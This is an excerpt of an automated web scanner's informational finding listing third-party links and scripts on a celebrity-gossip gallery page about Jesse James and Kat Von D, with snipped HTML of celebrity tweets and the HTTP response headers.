...[SNIP]...
<p>
<a href="http://twitter.com/DJPaulyD">DJPaulyD</a>: RT <a href="http://twitter.com/Akeel93">@Akeel93</a>: "<a href="http://twitter.com/DJPaulyD">@DJPaulyD</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/DJPaulyD/statuses/31727445837090816">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: :) RT <a href="http://twitter.com/BrandonnStRegis">@BrandonnStRegis</a> EVERY1 tune in2 the 90 minute long SEASON FINALE of RHOA 10pm on Bravo & <a href="http://twitter.com/kimzolciak">@kimzolciak</a> & <a href="http://twitter.com/biermann71">@biermann71</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31726145497989121">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/30371_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Bethenny">Bethenny</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Bethenny/statuses/31719343947522049">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: Yes! Lol RT <a href="http://twitter.com/AshNHartz">@AshNHartz</a>: <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a> Are you & <a href="http://twitter.com/biermann71">@biermann71</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31716672863731714">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: I was 3 months in this pic RT <a href="http://twitter.com/Please_Stand_By">@Please_Stand_By</a>: <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a> This is you recently pregnant? <a href="http://twitpic.com/3uqhh4">http://twitpic.com/3uqhh4</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31716118221561856">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/8376_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/BowWow">BowWow</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/BowWow/statuses/31716032452231168">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31712954776821760">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: Yes! Opening for a Huge mega star! I'm beyond excited! RT <a href="http://twitter.com/iutrav">@iutrav</a>: <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31712647732797440">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: Ur a doll! RT <a href="http://twitter.com/JoshGottlieb">@JoshGottlieb</a>: Fun day! Thank you <a href="http://twitter.com/BrielleZolciak">@BrielleZolciak</a>, <a href="http://twitter.com/arianazolciak">@arianazolciak</a> <a href="http://twitter.com/biermann71">@biermann71</a> and <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31712300427644928">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: RT <a href="http://twitter.com/AtlantaPlaces">@AtlantaPlaces</a>: Club Life is buzzing again: <a href="http://sch.mp/0jHde">http://sch.mp/0jHde</a> - RT <a href="http://twitter.com/KingLj11">@KingLj11</a> Me and <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a> @ club Life!! <a href="http://twitpic.com/3uqhh4">http://twitpic.com/3uqhh4</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31711564050472961">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/23936_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Jillzarin">Jillzarin</a>: On plane wish i could call in!RT <a href="http://twitter.com/lxnewyork">@lxnewyork</a> Getting ready to chat with our favorite sunday morning show <a href="http://twitter.com/lxtvopenho">@lxtvopenho</a>... <a href="http://tl.gd/8g30qb">http://tl.gd/8g30qb</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Jillzarin/statuses/31705598416392194">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/23936_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Jillzarin">Jillzarin</a>: So happy. Flying <a href="http://twitter.com/continental">@continental</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Jillzarin/statuses/31705092302315520">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4884_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/davenavarro6767">davenavarro6767</a>: <a href="http://twitter.com/Banshee_Song">@Banshee_Song</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/davenavarro6767/statuses/31690324585742336">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4884_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/davenavarro6767">davenavarro6767</a>: <a href="http://twitter.com/buddyhead">@buddyhead</a> <a href="http://youtu.be/fX_120DMFDQ">http://youtu.be/fX_120DMFDQ</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/davenavarro6767/statuses/31688081048342528">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4884_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/davenavarro6767">davenavarro6767</a>: <a href="http://twitter.com/ipierce89">@ipierce89</a> Oh no! Yur not DRIVING <a href="http://twitter.com/OMGitsjessielee">@OMGitsjessielee</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/davenavarro6767/statuses/31674584327528449">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4483_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/joshgroban">joshgroban</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/joshgroban/statuses/31672009905672192">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4483_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/joshgroban">joshgroban</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/joshgroban/statuses/31671556916645888">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/44221_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rzrachelzoe">rzrachelzoe</a>: RT <a href="http://twitter.com/prabalgurung">@prabalgurung</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rzrachelzoe/statuses/31667825831579649">Twitter</a>
...[SNIP]...
<li><a href="http://www.delish.com/recipes/cooking-recipes/tailgating-football-recipes?ocid=xnetr1-3">Tailgating time: 10 winning recipes</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/watch/video/celebrity-gridiron-fans/ufd8pil8?q=Football+Fan&rel=msn&from=en-us_msnhp&form=MSNXNM&ocid=xnetr1-5">Bing video: Celebrity gridiron fans</a>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" >BLTWY</a>
...[SNIP]...
<li class="hasMenu" id="hasMenu2"><a href="http://msn.foxsports.com/" class="hasMenuLink">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" >MLB</a></li><li><a href="http://msn.foxsports.com/nascar " >NASCAR</a></li><li><a href="http://msn.foxsports.com/nba" >NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball" >NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb" >NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl" >NFL</a></li><li><a href="http://msn.foxsports.com/nhl" >NHL</a></li><li><a href="http://msn.foxsports.com/fantasy" >Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer" >Soccer</a></li><li class="last"><a href="http://msn.foxsports.com/video?from=en-us_msnhp" >Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" >Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/" > Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " > Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" >Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" >Video</a>
...[SNIP]...
<li class="last"><a href="http://insidemsn.wordpress.com" >Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/" >White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/" >Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2" >Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " >Travel</a>
...[SNIP]...
<li class="bingLink last"><a href="http://www.bing.com/search?FORM=CWWWBQ" >Bing</a>
...[SNIP]...
<li><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_blank" class="pass">MSN Privacy</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/Entertainment.aspx" onclick="window.open(this.href,'help','width=960,height=720,resizeable=yes,status=no,titlebar=no,toolbar=no'); return false;" class="ignore" target="blank">Help</a>
...[SNIP]...
</p><a href="http://microsoft.com" >Microsoft</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

22.369. http://wonderwall.redacted/tv/ugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wonderwall.redacted
Path:	/tv/ugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery

Issue detail

The page was loaded from a URL containing a query string:

http://wonderwall.redacted/tv/ugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery?gt1=28135

The response contains the following links to other domains:

http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js
http://bit.ly/e3toNb
http://del.icio.us/post?title=580x600-110115A1_JAMES_J_B-GR_05&url=http%3A%2F%2Fwonderwall.msn.com%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347
http://digg.com/submit?phase=2title=580x600-110115A1_JAMES_J_B-GR_05&url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347
http://download.live.com/?sku=messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://insidemsn.wordpress.com/
http://microsoft.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/Entertainment.aspx
http://platform.twitter.com/widgets.js
http://reddit.com/submit?title=580x600-110115A1_JAMES_J_B-GR_05&url=http%3A%2F%2Fwonderwall.msn.com%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347
http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css
http://static.wonderwall.com/cache/css/1296066112/Z2FsbGVyeS5jc3M7Z2FsbGVyeS1zaXRlLmNzcztzdG9yeS5jc3M7c3Rvcnktc2l0ZS5jc3M7dG9wU3Rvcmllcy5jc3M7dG9wU3Rvcmllcy1zaXRlLmNzcztjYXRlZ29yeS5jc3M7Y2F0ZWdvcnktc2l0ZS5jc3M7dmlkZW8uY3NzO3ZpZGVvLXNpdGUuY3NzO3ZpZGVvQ2hhbm5lbHMuY3NzO2NlbGVicml0aWVzLmNzcztjZWxlYnJpdGllcy1zaXRlLmNzcztjZWxlYnJpdHkuY3NzO2NlbGVicml0eS1zaXRlLmNzcztodWIuY3NzO2h1Yi1zaXRlLmNzcztzaXRlU2VhcmNoLmNzcztzaXRlU2VhcmNoLXNpdGUuY3NzO2dlbmVyaWMuY3NzO2dlbmVyaWMtc2l0ZS5jc3M7Z2FtZS5jc3M7Z2FtZS1zaXRlLmNzcztzcGVjaWFsLmNzcztzcGVjaWFsLXNpdGUuY3Nz.css
http://static.wonderwall.com/cache/css/1296066112/Zm9udHMuY3NzO2ZvbnRzLXNpdGUuY3NzO3NpdGUuY3NzO2hlYWRlci5jc3M7bXNuSGVhZGVyLmNzcztiaW5nU2VhcmNoLmNzcztidXp6U3RyZWFtLmNzcztidXp6U3RyZWFtLXNpdGUuY3NzO3dhbGwuY3NzO3BjLmNzcztwYy1zaXRlLmNzcztuZXdzU3RyaXAuY3NzO2Zvb3Rlci5jc3M7cGFnaW5hdGlvbi5jc3M7dml0YWxpdHkuY3NzO2VtYmVkZGVkU2VhcmNoLmNzczt2b3RlLmNzcztyYXRpbmcuY3NzO21vcmVUaXRsZXMuY3NzO2V2ZXJ5dGhpbmcuY3NzO2NvbW1lbnRzLmNzcztjb21tZW50cy1zaXRlLmNzcztjcm9zc1Byb21vLmNzcztzaGFyZS5jc3M7c2hhcmUtc2l0ZS5jc3M7ZnJhbmNoaXNlTGlzdC5jc3M7ZmJTdHJpcGUuY3Nz.css
http://static.wonderwall.com/photos/Module1x1/1226_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/15124_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/15298_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/15856_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/15894_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/18487_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/25615_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/27217_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/32972_Module1x1_634164434770437095.jpg
http://static.wonderwall.com/photos/Module1x1/41323_Module1x1_634261162153428902.jpg
http://static.wonderwall.com/photos/Module1x1/7475_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/7477_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/7503_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/7877_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/7895_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/8376_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/9389_Module1x1.jpg
http://static.wonderwall.com/photos/Original/45347_Original.jpg
http://tl.gd/8fkbn3
http://twitpic.com/3kde2c
http://twitpic.com/3umrxp
http://twitter.com/2RQ
http://twitter.com/AIDSPolicyProj
http://twitter.com/AubreyODay
http://twitter.com/AubreyODay/statuses/31475592251580417
http://twitter.com/AubreyODay/statuses/31478843529232385
http://twitter.com/BowWow
http://twitter.com/BowWow/statuses/31481112115019776
http://twitter.com/BrianLynch
http://twitter.com/CarlaDiBello
http://twitter.com/DJPaulyD
http://twitter.com/DJPaulyD/statuses/31480933047603200
http://twitter.com/KimKardashian
http://twitter.com/KimKardashian/statuses/31468288559030272
http://twitter.com/KimKardashian/statuses/31468574493114368
http://twitter.com/LoBosworth
http://twitter.com/LoBosworth/statuses/31474891412738048
http://twitter.com/MirandaBuzz
http://twitter.com/MirandaBuzz/statuses/31469606199623680
http://twitter.com/PaulaAbdul
http://twitter.com/PerezHilton
http://twitter.com/PerezHilton/statuses/31481637023784960
http://twitter.com/PeterGriffinn
http://twitter.com/Punch800
http://twitter.com/RicardoFenty
http://twitter.com/SarahKSilverman
http://twitter.com/SarahKSilverman/statuses/31469730384580608
http://twitter.com/StevenGParry
http://twitter.com/__shelovesB
http://twitter.com/ashleeRocs
http://twitter.com/avoyermagyan
http://twitter.com/barbara230
http://twitter.com/csiriano
http://twitter.com/csiriano/statuses/31485259056943104
http://twitter.com/dovetailchicago
http://twitter.com/emmarosekenney
http://twitter.com/emmyrossum
http://twitter.com/emmyrossum/statuses/31490256649850880
http://twitter.com/freejessejames
http://twitter.com/iamdiddy
http://twitter.com/iamdiddy/statuses/31469852891807744
http://twitter.com/izzy_kardashian
http://twitter.com/kurumiuchino
http://twitter.com/llcoolj
http://twitter.com/llcoolj/statuses/31477242445959168
http://twitter.com/mccordalex
http://twitter.com/mccordalex/statuses/31471195719208960
http://twitter.com/michaelianblack
http://twitter.com/michaelianblack/statuses/31488824462811136
http://twitter.com/michaelianblack/statuses/31490865776037888
http://twitter.com/racheljosephf
http://twitter.com/rainnwilson
http://twitter.com/rainnwilson/statuses/31475437494345729
http://twitter.com/rihanna
http://twitter.com/rihanna/statuses/31482886624378880
http://twitter.com/rihanna/statuses/31484086254051328
http://twitter.com/rihanna/statuses/31485881311297536
http://twitter.com/samantharonson
http://twitter.com/samantharonson/statuses/31473844573179904
http://twitter.com/samantharonson/statuses/31473906485297152
http://twitter.com/samantharonson/statuses/31474068645478400
http://twitter.com/samantharonson/statuses/31474364587180033
http://twitter.com/share?original_referer=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347%26ocid%3Dtwtr-utweet
http://twitter.com/thekatvond
http://twitter.com/traverrains
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?FORM=CWWWBQ
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bing.com/videos/watch/video/celebrity-gridiron-fans/ufd8pil8?q=Football+Fan&rel=msn&from=en-us_msnhp&form=MSNXNM&ocid=xnetr1-5
http://www.bltwy.com/
http://www.delish.com/
http://www.delish.com/recipes/cooking-recipes/tailgating-football-recipes?ocid=xnetr1-3
http://www.mixx.com/submit?page_url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347
http://www.myspace.com/Modules/PostTo/Pages/?l=3t=580x600-110115A1_JAMES_J_B-GR_05&u=http%3A%2F%2Fwonderwall.msn.com%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347
http://yfrog.com/hsi3mlfj
http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js
https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 23:51:51 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
X-Cache-Lookup: HIT from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if lt IE 7]> <html class="ie ie6 lte9 lte8 lte7" xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<meta name="medium" content="image" />
<link rel="image_src" href="http://static.wonderwall.com/photos/Original/45347_Original.jpg" />

<meta property="fb:app_id" content="111376106992" />
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js"></script>
...[SNIP]...
</script>
<script src="http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<link rel="stylesheet" type="text/css" href="http://static.wonderwall.com/cache/css/1296066112/Zm9udHMuY3NzO2ZvbnRzLXNpdGUuY3NzO3NpdGUuY3NzO2hlYWRlci5jc3M7bXNuSGVhZGVyLmNzcztiaW5nU2VhcmNoLmNzcztidXp6U3RyZWFtLmNzcztidXp6U3RyZWFtLXNpdGUuY3NzO3dhbGwuY3NzO3BjLmNzcztwYy1zaXRlLmNzcztuZXdzU3RyaXAuY3NzO2Zvb3Rlci5jc3M7cGFnaW5hdGlvbi5jc3M7dml0YWxpdHkuY3NzO2VtYmVkZGVkU2VhcmNoLmNzczt2b3RlLmNzcztyYXRpbmcuY3NzO21vcmVUaXRsZXMuY3NzO2V2ZXJ5dGhpbmcuY3NzO2NvbW1lbnRzLmNzcztjb21tZW50cy1zaXRlLmNzcztjcm9zc1Byb21vLmNzcztzaGFyZS5jc3M7c2hhcmUtc2l0ZS5jc3M7ZnJhbmNoaXNlTGlzdC5jc3M7ZmJTdHJpcGUuY3Nz.css" />
<link rel="stylesheet" type="text/css" href="http://static.wonderwall.com/cache/css/1296066112/Z2FsbGVyeS5jc3M7Z2FsbGVyeS1zaXRlLmNzcztzdG9yeS5jc3M7c3Rvcnktc2l0ZS5jc3M7dG9wU3Rvcmllcy5jc3M7dG9wU3Rvcmllcy1zaXRlLmNzcztjYXRlZ29yeS5jc3M7Y2F0ZWdvcnktc2l0ZS5jc3M7dmlkZW8uY3NzO3ZpZGVvLXNpdGUuY3NzO3ZpZGVvQ2hhbm5lbHMuY3NzO2NlbGVicml0aWVzLmNzcztjZWxlYnJpdGllcy1zaXRlLmNzcztjZWxlYnJpdHkuY3NzO2NlbGVicml0eS1zaXRlLmNzcztodWIuY3NzO2h1Yi1zaXRlLmNzcztzaXRlU2VhcmNoLmNzcztzaXRlU2VhcmNoLXNpdGUuY3NzO2dlbmVyaWMuY3NzO2dlbmVyaWMtc2l0ZS5jc3M7Z2FtZS5jc3M7Z2FtZS1zaXRlLmNzcztzcGVjaWFsLmNzcztzcGVjaWFsLXNpdGUuY3Nz.css" />
<link rel="stylesheet" media="only screen and (max-device-width: 480px)" href="http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css" />
<link rel="stylesheet" media="only screen and (min-device-width: 481px) and (max-device-width: 1024px)" href="http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css" />
</head>
...[SNIP]...
<span><img src="http://static.wonderwall.com/photos/Original/45347_Original.jpg" class="imgSrc-http://static.wonderwall.com/photos/Original/45347_Original.jpg" alt="By Drew MackieYou know how it's awkward to see couples getting all handsy and kissy in public? Thanks to Jesse James and Kat Von D, this uncomfortable situation has been reproduced on Twitter. Yes, it's e-PDA, with all the gooey, sloppy show-offiness of a shameless couple in heat but delivered to your computers and phones. Click through to follow the exchange, but pace yourself: The out-of-character syrupy sweetness may overwhelm even the hardiest of constitutions.@FreeJesseJames: Done, off to the paint shop in the morning. @TheKatVonD: just so you know, you're impressing the hell outta me...Subtext: Kat Von D is easily impressed, given that going to various auto shop locations is part of Jesse James's daily work. Then again, look who she's dating. Her standards for impressive are clearly low.RELATED: See if Kat's blue dye job is a Hairdo or Hair Don't" /></span>
...[SNIP]...
<P ALIGN="LEFT">You know how it's awkward to see couples getting all handsy and kissy in public? Thanks to <A HREF="http://twitter.com/freejessejames" TARGET="_blank">Jesse James</A> and <A HREF="http://twitter.com/thekatvond" TARGET="_blank">Kat Von D</A>
...[SNIP]...
<b>@<A HREF="http://twitter.com/thekatvond" TARGET="_blank">TheKatVonD:</A>
...[SNIP]...
<li class="shareItem shareItem-twitter"><a href="http://twitter.com/share?original_referer=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347%26ocid%3Dtwtr-utweet" class="twitterProxy"></a>
...[SNIP]...
<li class="shareItem shareItem-windowsLive first"><a href="https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347" target="_blank">Windows Live</a>
...[SNIP]...
<li class="shareItem shareItem-delicious"><a href="http://del.icio.us/post?title=580x600-110115A1_JAMES_J_B-GR_05&url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347" target="_blank">Delicious</a></li><li class="shareItem shareItem-myspace"><a href="http://www.myspace.com/Modules/PostTo/Pages/?l=3t=580x600-110115A1_JAMES_J_B-GR_05&u=http%3A%2F%2Fwonderwall.msn.com%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347" target="_blank">MySpace</a></li><li class="shareItem shareItem-digg"><a href="http://digg.com/submit?phase=2title=580x600-110115A1_JAMES_J_B-GR_05&url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347" target="_blank">Digg</a></li><li class="shareItem shareItem-mixx"><a href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347" target="_blank">Mixx</a></li><li class="shareItem shareItem-reddit last"><a href="http://reddit.com/submit?title=580x600-110115A1_JAMES_J_B-GR_05&url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Fugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery%3FphotoId%3D45347" target="_blank">Reddit</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15894_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/michaelianblack">michaelianblack</a>: <a href="http://twitter.com/BrianLynch">@BrianLynch</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/michaelianblack/statuses/31490865776037888">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/41323_Module1x1_634261162153428902.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/emmyrossum">emmyrossum</a>: Day off today, <a href="http://twitter.com/emmarosekenney">@emmarosekenney</a> and I hit up <a href="http://twitter.com/dovetailchicago">@dovetailchicago</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/emmyrossum/statuses/31490256649850880">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15894_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/michaelianblack">michaelianblack</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/michaelianblack/statuses/31488824462811136">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/27217_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rihanna">rihanna</a>: <a href="http://twitter.com/__shelovesB">@__shelovesB</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rihanna/statuses/31485881311297536">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15298_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/csiriano">csiriano</a>: Important! Various ticket websites are selling fake tickets to my fashion show. I wish everyone who wanted to (cont) <a href="http://tl.gd/8fkbn3">http://tl.gd/8fkbn3</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/csiriano/statuses/31485259056943104">Twitter</a>
...[SNIP]...
</b>
